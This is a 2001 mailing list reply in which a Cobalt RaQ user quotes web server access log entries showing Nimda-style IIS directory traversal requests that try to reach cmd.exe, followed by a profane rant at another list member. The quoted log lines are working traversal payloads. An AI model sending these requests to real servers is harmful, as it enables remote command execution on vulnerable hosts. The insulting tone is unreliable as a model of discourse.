[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] access log weird stuff. hacker or virus
- Subject: RE: [cobalt-users] access log weird stuff. hacker or virus
- From: "brain_damaged" <brain_damaged@xxxxxxxxxxxxxxxxxxxx>
- Date: Fri Sep 28 01:37:24 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Kai,
Being new to the unix/cobalt game I wanted to make sure that it was not something more.
and if I recall right Nimda attackes IIS right ?
Not unix machines. Am I right there ?
I don't recall having IIS on my raq machine.
How did you get it to run on your raq machine ?
So to my thought why would I read on a cobalt list that runs unix about a nt exploit ?
Sounds off topic to me. I can read about nt exploits
on the windows lists or isp-tech list or other lists that concern themselves with window issues.
So Kai take your comment and shove it.
It was useless and just plain stupid and a waste of everyones time and bandwidth.
Thanks for making me realize that even in somber times assho!es continue to be assho!es.
Oh and next time you wanna be a tough guy with smart ass remarks why not have some dignity and email them
privately. ? Or is that just a assho!es way.
See others replies in kind and informative ways.
You just were and assho!e with nothing intelligent to say. Mom must be proud of you.
BD
>Maybe you should start reading the cobalt mailing list. We've been taling
>about nimda and red worm for ages.
>Get with the program!
>Look back in the logs!
>
>
>Kai.
>-----Original Message-----
>From: cobalt-users-admin@xxxxxxxxxxxxxxx
>[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of brain_damaged
>Sent: Friday, 28 September 2001 2:46 PM
>To: cobalt-users@xxxxxxxxxxxxxxx
>Subject: [cobalt-users] access log weird stuff. hacker or virus
>
>
>Hello,
>I went and check my access log and see this stuff.
>Looking for winnt on a linux system ?
>
>
> tail access
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
>/_me
>m_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
>302
>280 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
>/msa
>dc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
>32/c
>md.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
>/scr
>ipts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
>[root httpd]#
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users
>